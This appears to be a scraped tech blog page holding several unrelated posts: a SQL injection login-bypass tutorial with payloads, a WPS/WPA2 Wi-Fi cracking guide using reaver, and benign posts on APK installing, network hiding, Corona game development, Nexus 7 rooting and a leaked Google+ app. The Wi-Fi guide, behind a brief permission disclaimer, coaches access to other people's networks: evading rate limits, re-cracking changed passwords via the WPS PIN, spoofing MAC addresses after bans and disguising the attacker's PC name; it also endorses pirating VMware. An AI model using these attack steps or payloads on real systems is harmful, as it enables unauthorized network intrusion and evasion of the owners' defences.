What is SQL Injection?

0 comments
What is SQL Injection?
Acunetix describes it as ” the type of attack that takes advantage of improper coding of your web applications that allows hacker to inject SQL commands into say a login form to allow them to gain access to the data held within your database. In essence, SQL Injection arises because the fields available for user input allow SQL statements to pass through and query the database directly.” Today in this article, we are going to see login bypass using SQL Injection.
To make it more interesting, I am going to divide this article into two parts. First, the Web Programmer part and second the hacker part. I am going to use Wamp server for this.  Imagine a web programmer  has been hired to code a website for a newly formed company named shunya.  He codes the website as below.The first file is the  index.php.  On this page he creates three buttons. He adds functionality to the ‘Login’ button.
Image
Image
So when a user clicks on the Login button, he is  redirected to  another page called action.php which is a login form for the users of shunya.com.
Image
It’s script is given below.
Image
In the above code notice that the form action is set to process.php. This file validates the users. What this script does is, when a user enters the username and password it creates a connection to the database and checks if the user is in the database. If the user is in the database and his authentication is correct, he is taken to the page login_success.php.
Image
The above script is very important to understand SQL Injection. You can see that the username and password are submitted as raw input. Notice also the query underlined.
This is the database the programmer has created  for the website. 
Image
When a user in the database enters the correct password as shown below, he is redirected to the login_success page.
Image
The page below is the page I set for login_success.php.
Image
When a user not listed in the database, or a valid user logs tries to login without password like below,
Image
this happens.
Image
That’s the end of the programmer part. Now it’s time for the hacker part. A hacker happens to find the site of shunya.com. In the Login form, he inserts a single quote to see if the site is vulnerable to SQL Injection.
Image
He gets a below error message. This indicates the site is vulnerable to SQL Injection.
Image
Then he tries a query like the one shown below.
Image

Surprisingly, he gets access to the restricted area.How does the above query work. When a user enters the above query the statement $sql in the process.php works as,
$sql = “SELECT * FROM $tbl_name WHERE username= ” or ’0;’
This  is a valid  SQL query and user is validated even without checking the password. There are some other queries which can work similarly. Two of them are here.
‘ or ’1′=’1;
‘ or ’1′=’1”
When a hacker enters these two queries, the username field becomes
” or ’1′=’1;
which transforms to validate the user if username is empty or 1=1. Now whatever may happen, one will always be equal to one. We can find many more using trial and error. This vulnerability exists because we are supplying raw data to our application. Our web programmer after a short time finds out this vulnerability and patches it as below.
Image

What the mysql_real_escape_string does is it removes any  special characters from the input. Now try the same queries and see what happens. Thank you.

WPA2 Wi-Fi Password hacking guide (BT5/Kali linux)

0 comments
This guide is for penetration testing your own network or someone else's, with permission
using someone elses wifi is theft of service and may or may not  be a criminal offence in your area
Logan nor anyone from tek syndicate is liable for your actions, you are so proceed with caution!
EDIT; kali linux is now out as logan said on the tek a few weeks back, as kali is built from the same tools by the same team this guide work with both BT5 r3 and kali,

1st step you will need a copy of backtrack 5 so go here http://www.backtrack-linux.org/downloads/
or kali linux from here (guide is same for both) http://www.kali.org/downloads/
and get yourself an iso (32 or 64bit depending on your hardware)
either burn to disc using imgburn http://www.imgburn.com/index.php?act=download
or make a live usb of 4gb + then you can save sessions and not have to start over when you power off, its a good idea as i have had attacks take up to a day and a half (because of weak signal) and with a disc once powered down......
to do this i use this http://www.pendrivelinux.com/universal-usb-installer-easy-as-1-2-3/ itll do windows too....
or as a third option you could run it as a virtual machine with vmware from within windows, but if you do that you HAVE to use a usb wifi dongle because the internal wifi card of laptops gets seen as ethernet by the guest os, dont know why but i have found it to be true - vmware is not freeware, there maybe a trial or cripple ware version available here  http://www.vmware.com/uk/ but i sailed away from the pirate bay with my copy, i wont link directly to it as i may get in trouble from logan but you're a smart guy you can find it ;)
ok so now you have a disc/usb or virtual machine so power on, into BIOS (del,f11,f2 another key depending on hardware) and set it to boot from disc or usb, (not applicable to vm) and lets have some fun!
when the first menu comes up you want default text mode
when the cursor becomes available type "startx" without the quotes and it will boot into a desktop
go to the top of the screen and click on the little black screen to open a teminal (looks like a windows cmd window)
now to find out what wifi adaptor you have
type "airmon-ng" no quotes
if it doesnt list anything then your wifi adaptor is not compatible with bt5 it probably has no promiscuous mode or is lacking driver support but most laptop internal wifi i have found to work and most full size usb dongles do too the tp link tl wn821n works for definate.
the output from that is normally wlan0 but if you have multiple adaptors you will get more options
type "airmon-ng start wlan0"
assuming wlan0 was the output from previous command if not put what the output was for the adaptor you would like to use it will output monitoring enabled on mon0 most times unless you have multiple adaptors
so now we have set our adaptor to monitor the airwaves we can have a snoop at all the available networks
type "wash -i mon0"
and it will list all available networks signal strength encryption type bssid's and other things, we are looking for networks with wpa2/psk WEP is also dooable and much quicker, but as a security standard it is dead and not in common use any more but if you would like a guide for that too, let me know in the thread and when i have a moment.....
anyway choose your victims bssid and
type "reaver -i mon0 -bBSSIDGOESHERE -vv"
and it will start running through the all the possible wps set up pins randomly, it maybe that you get ap rate limiting detected, this is where a router recognises that it is getting attacked from all the wrong passwords and stops bt5 from accessing it rfor a set amount of time to combat this youi need to add a delay -d command to the reaver command line so it looks something  like this
"reaver -i mon0 -b21.34.56.23.54 -d20 -vv"
if ap rate limiting still detected keep increasing the delay by 5 seconds untill you stop tripping the ap rate limit
by using the -vv comand you get more verbose output from the termional wich allows you to see if it is channel hopping or ap rate limiting or whatever and it also lets you see when it gets caught in a loop on a particular password when this happens i press cntrl+c to stop session then up cursor for last command and enter and it picks up where it left off and normally carries on without stuttering on the same password again
after time passes it will output the password and pin number copy both down as if the password is changed you can run the reaver command line again with a -pPINHERE and it will break new password in less than a minit as the pin doesnot change this would look like
"reaver -i mon0 -b23.56.76.45. -p123456 -vv"
the password will get changed if your found on a network you are not supposed to be on wich is why i put that command there as i have had it happen a few times
if this goes on and the network admin is savvy they may stop changing the password and start banning mac addresses from connecting to the router but dont fear!
i use this http://www.technitium.com/ to change my mac address as i have had to deal with this problem before
as a side note, if you are going to jump on a network that isnt yours change your pc name to something not identifiable to you mine is called vm.lineupdate32 as the target network is on virgin media....see?

APK Batch Installer (Install & Backup, SD, Wireless, Data) - v1.3.0d

0 comments
It was a lot of pain getting the applications I had previously installed back in, even if I had backed up their APK's before using tools like AppMonster. Batch installing was a bit difficult with errors sometimes cropping up and some apps not working on ICS, and so that pretty much drove me to write... this.

-= APK Batch Installer =-

A simple little windows app that is packaged with adb.exe, and if you're so nice as to give it the directory as to which all your apk files are stored (I keep local backups on my pc for mine), then it'll scan that directory for apk files.


From there, it's just checking and ticking the apps you want to install and clicking next


And if things go right It should automatically take you through the installation 

---- *ROOT* Batch Backup APks ----

As of v1.02 there is a backup function 

Simply click on the 'Batch Backup APKs' radio button, and fill in your options in the entry fields

And wait for the application to run through your device, backing their APK's into a local directory.



It scans if you have applications installed to your SD Card as well...

And is so kind as to rename your apk's based on their app names too 

---- Installs to SD Storage ----

As of v1.1.1, the Install to SD function has been revamped, such that after you tick 'Install to SD' and choose which apps to install...

An additional dialogue box will pop up, allowing you to choose which of the chosen APKs are installed to SD.

From there, the installer will update you on the progress of installations, and tell you which applications are being installed to SD.


---- *ROOT* Wireless ADB Connections ----

As of v1.2.0, as per suggestion by thewarhawk, and after an extensive amount of testing, APK Batch Install Tool now has support for Wireless ADB Transfers! 

Simply tick on it on the main page, and get ready your IP Details from your favourite Wireless ADB software 

After that, fill in the details and click "Establish Link" :3

Of course, if you throw it rubbish links, it'll hate you for it, and give you a sad android face.


With a proper link though, one that points to an actual device already set up, a happy face! 

After that, it's all smooth sailing as the application sends or backs up your APKs 


---- *ROOT* App Data Backup & Restore ----

After a LOT OF BLOOD, SWEAT, TEARS, and Nearly going crazy with all of this, I finally present to you peeps... after v1.3.0, the ability to backup and restore app data. NOTE, that the data is stored in a format that is not compatible with Titanium or any of those other applications. The backup and restore are currently in it's simplest form, in that you have to back up data, in order to restore it. At the moment, based on the way APK's work and how I can pull information off them, you have to back up all installed apps on your device before you can individually select which ones to pull data from.

Once that is done, when installing APK's back onto your device, when Data Restore is flagged, the program will look to the directed path for a SubFolder called Data, that contains all the Data for the apps, in 7z format. From there, you can select which to restore to your device.

But enough Chit Chat.


If 'Backup Data' is flagged, then at the end of the backing up process, you will be presented with a screen to select which of the following backed up apps to back data for...

From there...

It's watching and waiting as the installer does it's work 

On to Restoration! Should the 'Restore Data' option be checked whilst in install mode... then

After selecting which APKs to install (and which to install to SD), you will be presented with this fine screen that asks you to choose which apps to restore data for (only apps with data are shown)

From there...

At the end of the installation process, the data of the selected apps will be restored onto the device 

---- Batch APK Renamer ----
v1.3.0a brings a small addition to the family, a bulk APK renamer, essentially a subdivision of what the backup function did 


Simply Point to directory with Messy APKs...

and....


Let It do the rest  

How To Hide Your Computer From Windows Network Neighborhood

0 comments

If you share Windows folders, you probably noticed that when you browse Network Neighborhood ("My Network" in XP or "Network" in Vista), Windows broadcast your PC name to anyone browsing on the same subnet.

While this is no big deal, you may want to hide you Computer from being discovered, but still be able to connect to your shared folders.
To hide your computer from being browsed in Network Neighborhood, open a command prompt by clicking on  Start \ Run… and typing the following:
net config server /HIDDEN:YES
If the command was executed successfully, you should see "The command completed successfully." or you can verify with the following command :
net config server
and check that the  "Server hidden" status is Yes:
Server Name                           \\WTN1
Server Comment                       
Software version                      Windows 2002
Server is active on                  
    NetbiosSmb (000000000000)
    NetBT_Tcpip_{F08BC22F-B129-43DF-886A-850FA5A9EF7F} (000c29f61483)
Server hidden                         Yes
Maximum Logged On Users               10
Maximum open files per session        16384
Idle session time (min)               15
The command completed successfully.

 
Now reboot your Computer and when Windows has restarted, you will no longer be able to see it when browsing the network. When you want to connect to a shared folder, you can map the drive using the following syntax from Windows Explorer (Tools \ Map Network Drive…)
\\computername\sharename
So if I wanted to connect to the shared folder called media on my computer named wtn1, I would map it as:
\\wtn1\media
If you want to unhide your Computer, type the following at a command prompt and reboot:
net config server /HIDDEN:NO
Remember, hiding your Computer from the Network is by no means secure or a substitute for security. You should always secure your shares when necessary with proper permissions.

How to Build a game for iOS and Android with Corona

0 comments


So, you decided to make your first game for iOS or Android and you will use Corona? Great choice, let’s see what you need to know to get the things started. We will divide this article in 3 sections; setting up, getting started and final touches.
These steps will be more than enough to figure out the basics of game development on Corona. Don’t forget, some of the most popular games for Smartphones (such as Blast Monkeys and Bubble Ball) were developed using Corona SDK.

Setting up the whole thing

To develop another iTunes hit is not that hard, but first thing you have to do is to download the Corona SDK from the official site. They offer UNLIMITED free trial version where you can play as much as you want until you decide to publish the app. Only at that moment you will need to subscribe. So, sign up for your free membership and start creating eBooks, Games and much more…Corona is one of a kind and you must (at least) try this software.
I was totally clueless about programming and app development but I decided to sign up and give it a try. I will try to go with the eBook and if this goes well- Gaming world here I come!

Getting Started

Corona is great for those physics games where you have to figure out how to jump, push, slice or move in order to reach the goal. You know those 2D popular games; there are thousands of those in the app stores.
First thing you need is a simple text editor such as Notepad; everybody has this, right? Next thing you should do is to write some basic code, so you can see what is going to happen. If you don’t have a clue about it, search a bit on YouTube or download the codes from Corona website, there are tons of these there waiting free of charge.
The Corona application is based on main.lua files, and this is the starting point of the application. Beside this basic file you will see that there are build.settings andconfig.lua parameters.
So, when you write your first code in the Notepad, copy and paste this intobuild.settings file; save it and close. Once you finished this one, go to Notepad again and type another set of codes which will tell the application what to do with the codes that you copied in the build.settings. This set of codes goes to config.lua.
Now there is much more to game building on Corona but this is pretty much the very basic that you need to get started. Now, one article can’t teach you how to make the next big hit for iPhone but we can tell you some basic things that you can use over and over again.
Some basic codes to help you out
For example, if you need to create physics game (these games are so popular) you need just one little line of the code: local physics = require(“physics”); and voila! You have the physics based game.
If you want to make some comment while working on the game you can always insert the comment in the code so you can know what does this code stands for. Just type double dashes and a comment before your code and that’s it. Example — Generate Physics Engine.
If you want to create a text that will be displayed for the player (for example, when he/she is waiting the page to load) write this line of code:

– Create a new text field using native device font

local screenText = display.newText(“…Loading Screen…”, 0, 0, native.systemFont, 16*2);
screenText.xScale = 0.6
screenText.yScale = 0.6;

Instead of a conclusion

If you want to learn more please visit Corona website because this is the best place to learn everything you need about game development using Corona. They even have Corona for dummies kind of books.
Author Bio: The article is written by Jason Phillips. He is a professional writer as well as senior editor at some gaming sites. Click here to know about his sites.

How to Root Nexus 7 On Android 4.1 Jelly Bean, Unlock Bootloader, And Flash ClockworkMod Recovery

1 comments

Amazingly developers have devised a successful way to achieve root to your Nexus 7 when it’s not even released yet. Now you can not only root your Nexus 7 but also can unlock Bootloader and Flash ClockworkMod Recovery.
Here is a step by step guide for How to root Nexus 7 and this process additionally will guide you to how to unlock Bootloader and Flash ClockworkMod Recovery. The whole process is super simple and you just need to follow the guide as it is.
But before we precede any further you must know that this process will void your device warranty and in case any damage occurs, proceed at your own risk.
The whole process is segregated into three parts which include Unlocking of Bootloader, Making ClockworkMod Recovery Permanent and finally gaining root access.

How to Unlock Bootloader

  1. Isntall Android SDk once it is downloaded to your device.
  2. Enter Settings> Developer options to enable USB Debugging.
  3. Connect Nexus 7 to PC using USB cable connection.
  4. Eneter Launch terminal or Command prompt and navigate to fastboot folder where Android SDK is installed and command ‘Fastboot oem unlock’. After flashing is complete enter ‘Fastboot reboot’.
  5. Download the recovery image and place it in fastboot folder and enter the command ‘Fastboot flash recovery CWM-grouper-recovery.img’
  6. Step 6: Reboot  by entering ‘Fastboot reboot’.

How to make ClockworkMod Recovery Permanent

Enter following commands in terminal in the stated sequences
  1. ‘Mount system’
  2. ‘Adb shell’
  3. ‘Cd/system’
  4. ‘Mv recovery-from-boot.p recovery-from-boot.bak’.

How to gain Root Access

  1. Download ‘JB-SuperSU.zip ‘file and place it in your sdcard on your device
  2. Switch off your device to Enter ClockworkMod Recovery (Press Volume up + volume down + power button).
  3. Navigate to choose downloaded JB-superSU.Zip file downloaded and placed on your sdcard.
  4. Reboot your device.
If you have followed all the steps successfully then you are all done by now to select and install your favorite root-only apps.

Ice Cream Sandwich Android 4.0 (ICS) app leaked :Google+ 2.0 and Google Music

0 comments

The Android users must be delighted with the news that the latest version of Android which is Ice Cream Sandwich is now supports Google + as a built in app. The news was came in today after the leaked news for Google music. All the smartphones running on Android 4.0 Ice Cream Sandwich will now having a cool Google + app.
Ice Cream Sandwich Android 4.0 (ICS) app leaked :Google+ 2.0 and Google Music Images has been credited to Androidpolice

No official announcement has been made by any of the search giant players. The news came in by a blog which is totally dedicated to the Google’s operating system and the blog is Android Police. So if you want to know anything and any latest happenings about Android, you must follow the Android Police regularly.
The owner of the blog claimed that the he has that Verizon device which is powered by Android 4.0 Ice Cream Sandwich and the screen shots are also provided by the founder of the blog. The screenshots are pretty much impressive though. Interface and layouts of the app are very much polished and it seems to be smoothly running in the devices with Android 4.0 Ice Cream Sandwich.
This is not the only versions of the Android operating system which supports this app, All the previous version are also compatible with this app. The G+ app runs equally well on smartphone powered by Ginger bread and Tablet PCs powered by Honeycomb versions. The claim made by the blog so far is quite right because if you happen to use the app on any device, this is the coolest Google + app ever.
The blog noted:” As you can see, the update doesn’t bring much in way of function, but it does bring a nice aesthetic update. There is one key thing missing, however: the widget. That’s right — for some reason, the widget is nowhere to be found… but only on phones. This is most likely still a test build, so I would expect the widget to pop back up in the future. It is still available on tablets, and it’s a major upgrade from the current widget.”
Check out your settings before you install it because if you don’t have unknown sources enabled in the settings of your applications, you will not be able to install the app.
The app is now available to download and is easy to install. Have it downloaded and get your hands on it. So if you happen to be a regular user of Google + from your smartphones, this is one is out for you, go grab it, Write us your reviews as well.

Statistik

Powered by Blogger.